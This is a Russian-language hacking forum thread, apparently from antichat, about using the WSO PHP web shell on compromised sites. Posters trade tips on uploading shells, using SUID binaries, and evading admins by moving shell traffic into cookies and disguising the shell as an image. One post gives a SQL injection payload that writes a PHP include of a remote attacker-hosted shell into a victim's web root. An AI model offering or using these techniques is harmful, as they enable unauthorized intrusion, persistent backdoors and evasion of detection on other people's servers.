Тебе тогда в другую тему для начала - http://forum.antichat.ru/thread296327.html Суидник нужен, если у тебя уже есть рут-доступ.
Залей в tmp, может тебе так больше понравиться Главное ещё, чтобы файл рутом был создан.... +s права всмысле..
скажите вопрос такой, залить шелл залил, пытаюсь править файл .htaccess не дает, пишет правка запрещена, пытался поправить конфиг или изменить права доступа тоже не дает, что можно еще попробовать? шеллом как то поменять файл .htaccess кроме простого способа есть шанс??? или может как то изменить права на конфиг?
после редактирования файлов выдает Code: Query did not return anything из-за чего это? и да, изменения не сохраняются.
Зарегил домен hut4.ru на сайте holm.ru , залил к себе на сайт wso , и теперь я могу видеть абсолютно все сайты зарегистрированые на hut4.ru + login (вроде больше ничего не могу делать). Это недоработки сервера или это нормально? Я новичок и не знаю , просто интересно что это значит? Заранее спасибо за ответ.
А ты при дампе укажи в названии файла диру куда надо дамп положить, например /tmp/wso-22323.zip Абсолютно нормальная ситуация, не нормально, если при этом ядро старое и дырявое)
Тыц Было бы неплохо доработать шелл, или выпустить альтернативную версию чтобы параметры передавались не постом а через СOOKIE, думаю на JavaScript пару минут скриптик написать чтобы при клике вызывалась функция с параметрами, которая установит новое значение куки и обновит страницу чтобы они передались. P.S. плюсов от этого будет много) к примеру шелл замаскирован под картинку, и в логах админ в 2 счета поймет что Запись вида "POST /images/lalala.jpg" выглядит подозрительной)) можно даже обратно передавать данные через Set-Cookie:, и тогда не будет меняться размер файла при выдаче, т.к. если подряд идет обращение к одной картинке, у которой в логах каждый раз новый размер тоже вызывает подозрения)) думаю лучше всего если выпустить просто альтернативную версию аля "Cookie Edition", в которой будут только основные функции, которые можно реализовать через куки (само собой файлы заливать через куки не катит))) P.S. Надеюсь меня услышат, спасибо)
Бредовый метод. Мне кажется что в r57 лучше поправить функцию ex (добавить ./suid) и юзать на здоровье. Потому как там список файлов через ls -lua выводится.
При работе через suid-файл есть проблемы с редактированием файлов, размер которых > ~5 Кб. Выводится чистая страница с "Query did not return anything". Это как-нибудь фиксится?
Пытаюсь залить через скул, вбиваю запрос Code: union select '<? @include("http://mysite/shell.php"); ?>' into outfile '/var/www/htdocs/404.php' Захожу на http://www.victim.com/404.php, мне вылезает 404. Куда он девается?
Господ ТС, интересует следующий вопрос: был ли исправлен баг при базе данных с таблицами, содержащими пробелы в имени? В оригинальном ВСО sql браузер просто фейлит конкретно, если такие таблицы присутствуют... Проблема в передачe count(*), нужно брать имена таблиц в кавычки при обращении select .. from 'table name'...
Дорогой элито-бир, величайший автор рдп брут PRIV8 (здравствуй, давно не виделись) 1) В данном топике я хотел бы обсудить конкретно WSO, а не нечто другое (PAS в данный момент меня не интересует, я знаю что это). 2) Меня не особо интересует что ты не встречался с данным вопросом, т.к. просто руки не доходили или ещё почему либо, в то время как баг присутствует и я предлагаю его фикс. По-этому прошу не офтопить, хотя бы потому, что мой конкретный вопрос был адресован к ТС. Спасибо
Он более мелкого размера. Это на случай обхода ограничения на объём загружаемого файла. - Можно закосить под "картинку" ну или ещё что-то что требуется...